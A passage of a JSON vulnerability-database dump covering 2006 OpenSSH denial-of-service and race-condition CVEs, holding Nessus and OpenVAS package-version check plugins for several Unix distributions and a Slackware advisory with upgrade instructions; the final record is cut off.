script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(362, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:openssh\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:openssh-portable\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/09/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/09/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/10/02\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"openssh<4.4,1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"openssh-portable<4.4.p1,1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:09:36", "bulletinFamily": "scanner", "description": "Two denial of service problems have been found in the OpenSSH server.\nThe Common Vulnerabilities and Exposures project identifies the following vulnerabilities :\n\n - CVE-2006-4924 The sshd support for ssh protocol version 1 does not properly handle duplicate incoming blocks. This could allow a remote attacker to cause sshd to consume significant CPU resources leading to a denial of service.\n\n - CVE-2006-5051 A signal handler race condition could potentially allow a remote attacker to crash sshd and could theoretically lead to the ability to execute arbitrary code.", "modified": "2018-07-20T00:00:00", "id": "DEBIAN_DSA-1212.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=23661", "published": "2006-11-20T00:00:00", "title": "Debian DSA-1212-1 : openssh - Denial of service", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 70103\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-1212. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(23661);\n script_version(\"1.17\");\n script_cvs_date(\"Date: 2018/07/20 2:17:12\");\n\n script_cve_id(\"CVE-2006-4924\", \"CVE-2006-5051\");\n script_bugtraq_id(20216, 20241);\n script_xref(name:\"DSA\", value:\"1212\");\n\n script_name(english:\"Debian DSA-1212-1 : openssh - Denial of service\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Two denial of service problems have been found in the OpenSSH server.\nThe Common Vulnerabilities and Exposures project identifies the\nfollowing vulnerabilities :\n\n - CVE-2006-4924\n The sshd support for ssh protocol version 1 does not\n properly handle duplicate incoming blocks. This could\n allow a remote attacker to cause sshd to consume\n significant CPU resources leading to a denial of\n service.\n\n - CVE-2006-5051\n A signal handler race condition could potentially allow\n a remote attacker to crash sshd and could theoretically\n lead to the ability to execute arbitrary code.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=392428\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2006-4924\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2006-5051\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2006/dsa-1212\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the openssh package.\n\nFor the stable distribution (sarge), these problems have been fixed in\nversion 1:3.8.1p1-8.sarge.6.\n\nFor the unstable and testing distributions, these problems have been\nfixed in version 1:4.3p2-4.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(362, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:openssh\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/11/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/11/20\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/09/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"3.1\", prefix:\"ssh\", reference:\"1:3.8.1p1-8.sarge.6\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"ssh-askpass-gnome\", reference:\"1:3.8.1p1-8.sarge.6\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:09:36", "bulletinFamily": "scanner", "description": "The remote host is affected by the vulnerability described in GLSA-200611-06 (OpenSSH: Multiple Denial of Service vulnerabilities)\n\n Tavis Ormandy of the Google Security Team has discovered a pre-authentication vulnerability, causing sshd to spin until the login grace time has been expired. Mark Dowd found an unsafe signal handler that was vulnerable to a race condition. It has also been discovered that when GSSAPI authentication is enabled, GSSAPI will in certain cases incorrectly abort.\n Impact :\n\n The pre-authentication and signal handler vulnerabilities can cause a Denial of Service in OpenSSH. The vulnerability in the GSSAPI authentication abort could be used to determine the validity of usernames on some platforms.\n Workaround :\n\n There is no known workaround at this time.", "modified": "2018-07-11T00:00:00", "id": "GENTOO_GLSA-200611-06.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=23671", "published": "2006-11-20T00:00:00", "title": "GLSA-200611-06 : OpenSSH: Multiple Denial of Service vulnerabilities", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200611-06.\n#\n# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(23671);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2018/07/11 17:09:25\");\n\n script_cve_id(\"CVE-2006-5051\", \"CVE-2006-5052\");\n script_bugtraq_id(20241, 20245);\n script_xref(name:\"GLSA\", value:\"200611-06\");\n\n script_name(english:\"GLSA-200611-06 : OpenSSH: Multiple Denial of Service vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200611-06\n(OpenSSH: Multiple Denial of Service vulnerabilities)\n\n Tavis Ormandy of the Google Security Team has discovered a\n pre-authentication vulnerability, causing sshd to spin until the login\n grace time has been expired. Mark Dowd found an unsafe signal handler\n that was vulnerable to a race condition. It has also been discovered\n that when GSSAPI authentication is enabled, GSSAPI will in certain\n cases incorrectly abort.\n \nImpact :\n\n The pre-authentication and signal handler vulnerabilities can cause a\n Denial of Service in OpenSSH. The vulnerability in the GSSAPI\n authentication abort could be used to determine the validity of\n usernames on some platforms.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.openssh.com/txt/release-4.4\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200611-06\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All OpenSSH users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-misc/openssh-4.4_p1-r5'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(362);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:openssh\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/11/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/11/20\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/09/28\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"net-misc/openssh\", unaffected:make_list(\"ge 4.4_p1-r5\"), vulnerable:make_list(\"lt 4.4_p1-r5\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"OpenSSH\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "slackware": [{"lastseen": "2019-05-30T07:37:10", "bulletinFamily": "unix", "description": "New openssh packages are available for Slackware 8.1, 9.0, 9.1, 10.0, 10.1,\n10.2, and -current to fix security issues.\n\nMore details about these issues may be found in the Common\nVulnerabilities and Exposures (CVE) database:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4924\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5051\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5052\n\n\nHere are the details from the Slackware 10.2 ChangeLog:\n\npatches/packages/openssh-4.4p1-i486-1_slack10.2.tgz:\n Upgraded to openssh-4.4p1.\n This fixes a few security related issues. From the release notes found at\n http://www.openssh.com/txt/release-4.4:\n * Fix a pre-authentication denial of service found by Tavis Ormandy,\n that would cause sshd(8) to spin until the login grace time\n expired.\n * Fix an unsafe signal hander reported by Mark Dowd. The signal\n handler was vulnerable to a race condition that could be exploited\n to perform a pre-authentication denial of service. On portable\n OpenSSH, this vulnerability could theoretically lead to\n pre-authentication remote code execution if GSSAPI authentication\n is enabled, but the likelihood of successful exploitation appears\n remote.\n * On portable OpenSSH, fix a GSSAPI authentication abort that could\n be used to determine the validity of usernames on some platforms.\n Links to the CVE entries will be found here:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4924\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5051\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5052\n After this upgrade, make sure the permissions on /etc/rc.d/rc.sshd are set\n the way you want them. Future upgrades will respect the existing permissions\n settings. Thanks to Manuel Reimer for pointing out that upgrading openssh\n would enable a previously disabled sshd daemon.\n Do better checking of passwd, shadow, and group to avoid adding\n redundant entries to these files. Thanks to Menno Duursma.\n (* Security fix *)\n\nWhere to find the new packages:\n\nHINT: Getting slow download speeds from ftp.slackware.com?\nGive slackware.osuosl.org a try. This is another primary FTP site\nfor Slackware that can be considerably faster than downloading\nfrom ftp.slackware.com.\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating additional FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the "Get Slack" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 8.1:\nftp://ftp.slackware.com/pub/slackware/slackware-8.1/patches/packages/openssh-4.4p1-i386-1_slack8.1.tgz\n\nUpdated package for Slackware 9.0:\nftp://ftp.slackware.com/pub/slackware/slackware-9.0/patches/packages/openssh-4.4p1-i386-1_slack9.0.tgz\n\nUpdated package for Slackware 9.1:\nftp://ftp.slackware.com/pub/slackware/slackware-9.1/patches/packages/openssh-4.4p1-i486-1_slack9.1.tgz\n\nUpdated package for Slackware 10.0:\nftp://ftp.slackware.com/pub/slackware/slackware-10.0/patches/packages/openssh-4.4p1-i486-1_slack10.0.tgz\n\nUpdated package for Slackware 10.1:\nftp://ftp.slackware.com/pub/slackware/slackware-10.1/patches/packages/openssh-4.4p1-i486-1_slack10.1.tgz\n\nUpdated package for Slackware 10.2:\nftp://ftp.slackware.com/pub/slackware/slackware-10.2/patches/packages/openssh-4.4p1-i486-1_slack10.2.tgz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/openssh-4.4p1-i486-1.tgz\n\n\n\nMD5 signatures:\n\nSlackware 8.1 package:\n0a42fb286fd722f019dfc5f167d69ced openssh-4.4p1-i386-1_slack8.1.tgz\n\nSlackware 9.0 package:\n92563664845d902251d7b19254b3dda1 openssh-4.4p1-i386-1_slack9.0.tgz\n\nSlackware 9.1 package:\n5814a00eefa0b1e1fe7673862525788e openssh-4.4p1-i486-1_slack9.1.tgz\n\nSlackware 10.0 package:\n24ce8b2013b8759a173e5ccd7db54289 openssh-4.4p1-i486-1_slack10.0.tgz\n\nSlackware 10.1 package:\ne7950e6a357871092514ce07051f055e openssh-4.4p1-i486-1_slack10.1.tgz\n\nSlackware 10.2 package:\nb8d2d67276a662de40d6adf9bfe00bce openssh-4.4p1-i486-1_slack10.2.tgz\n\nSlackware -current package:\n6f2c30b503db9685180af6f4a87eadcc openssh-4.4p1-i486-1.tgz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg openssh-4.4p1-i486-1_slack10.2.tgz\n\nIf you are running an sshd daemon, restart it:\n\nsh /etc/rc.d/rc.sshd restart", "modified": "2006-09-29T00:57:38", "published": "2006-09-29T00:57:38", "id": "SSA-2006-272-02", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2006&m=slackware-security.592566", "title": "openssh", "type": "slackware", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2017-07-24T12:51:17", "bulletinFamily": "scanner", "description": "The remote host is missing an update as announced\nvia advisory SSA:2006-272-02.", "modified": "2017-07-07T00:00:00", "published": "2012-09-11T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=57492", "id": "OPENVAS:57492", "title": "Slackware Advisory SSA:2006-272-02 openssh", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: esoft_slk_ssa_2006_272_02.nasl 6598 2017-07-07 09:36:44Z cfischer $\n# Description: Auto-generated from the corresponding slackware advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"New openssh packages are available for Slackware 8.1, 9.0, 9.1, 10.0, 10.1,\n10.2, and -current to fix security issues.\";\ntag_summary = \"The remote host is missing an update as announced\nvia advisory SSA:2006-272-02.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=SSA:2006-272-02\";\n \nif(description)\n{\n script_id(57492);\n script_tag(name:\"creation_date\", value:\"2012-09-11 01:34:21 +0200 (Tue, 11 Sep 2012)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:36:44 +0200 (Fri, 07 Jul 2017) $\");\n script_cve_id(\"CVE-2006-4924\", \"CVE-2006-5051\", \"CVE-2006-5052\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 6598 $\");\n name = \"Slackware Advisory SSA:2006-272-02 openssh \";\n script_name(name);\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Slackware Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/slackware_linux\", \"ssh/login/slackpack\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-slack.inc\");\nvuln = 0;\nif(isslkpkgvuln(pkg:\"openssh\", ver:\"4.4p1-i386-1_slack8.1\", rls:\"SLK8.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"openssh\", ver:\"4.4p1-i386-1_slack9.0\", rls:\"SLK9.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"openssh\", ver:\"4.4p1-i486-1_slack9.1\", rls:\"SLK9.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"openssh\", ver:\"4.4p1-i486-1_slack10.0\", rls:\"SLK10.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"openssh\", ver:\"4.4p1-i486-1_slack10.1\", rls:\"SLK10.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"openssh\", ver:\"4.4p1-i486-1_slack10.2\", rls:\"SLK10.2\")) {\n vuln = 1;\n}\n\nif(vuln) {\n security_message(0);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:39:03", "bulletinFamily": "scanner", "description": "The remote host is missing an update as announced\nvia advisory SSA:2006-272-02.", "modified": "2019-03-15T00:00:00", "published": "2012-09-11T00:00:00", "id": "OPENVAS:136141256231057492", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231057492", "title": "Slackware Advisory SSA:2006-272-02 openssh", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: esoft_slk_ssa_2006_272_02.nasl 14202 2019-03-15 09:16:15Z cfischer $\n# Description: Auto-generated from the corresponding slackware advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.57492\");\n script_tag(name:\"creation_date\", value:\"2012-09-11 01:34:21 +0200 (Tue, 11 Sep 2012)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 10:16:15 +0100 (Fri, 15 Mar 2019) $\");\n script_cve_id(\"CVE-2006-4924\", \"CVE-2006-5051\", \"CVE-2006-5052\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 14202 $\");\n script_name(\"Slackware Advisory SSA:2006-272-02 openssh\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Slackware Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/slackware_linux\", \"ssh/login/slackpack\", re:\"ssh/login/release=SLK(8\\.1|9\\.0|9\\.1|10\\.0|10\\.1|10\\.2)\");\n\n script_xref(name:\"URL\", value:\"https://secure1.securityspace.com/smysecure/catid.html?in=SSA:2006-272-02\");\n\n script_tag(name:\"insight\", value:\"New openssh packages are available for Slackware 8.1, 9.0, 9.1, 10.0, 10.1,\n10.2, and -current to fix security issues.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to the new package(s).\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update as announced\nvia advisory SSA:2006-272-02.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-slack.inc\");\n\nreport = \"\";\nres = \"\";\n\nif((res = isslkpkgvuln(pkg:\"openssh\", ver:\"4.4p1-i386-1_slack8.1\", rls:\"SLK8.1\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"openssh\", ver:\"4.4p1-i386-1_slack9.0\", rls:\"SLK9.0\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"openssh\", ver:\"4.4p1-i486-1_slack9.1\", rls:\"SLK9.1\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"openssh\", ver:\"4.4p1-i486-1_slack10.0\", rls:\"SLK10.0\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"openssh\", ver:\"4.4p1-i486-1_slack10.1\", rls:\"SLK10.1\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"openssh\", ver:\"4.4p1-i486-1_slack10.2\", rls:\"SLK10.2\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-04-06T11:40:43", "bulletinFamily": "scanner", "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n openssh\n openssh-askpass\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5019505 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/", "modified": "2018-04-06T00:00:00", "published": "2009-10-10T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231065248", "id": "OPENVAS:136141256231065248", "type": "openvas", "title": "SLES9: Security update for OpenSSH", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: sles9p5019505.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Security update for OpenSSH\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n openssh\n openssh-askpass\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5019505 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n \nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.65248\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-10 16:11:46 +0200 (Sat, 10 Oct 2009)\");\n script_cve_id(\"CVE-2006-4924\", \"CVE-2006-4925\", \"CVE-2006-5051\", \"CVE-2006-5052\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"SLES9: Security update for OpenSSH\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"openssh\", rpm:\"openssh~4.1p1~11.28\", rls:\"SLES9.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-25T10:56:56", "bulletinFamily": "scanner", "description": "Check for the Version of openssh", "modified": "2017-07-10T00:00:00", "published": "2009-02-27T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=861319", "id": "OPENVAS:861319", "title": "Fedora Update for openssh FEDORA-2007-395", "type": "openvas", 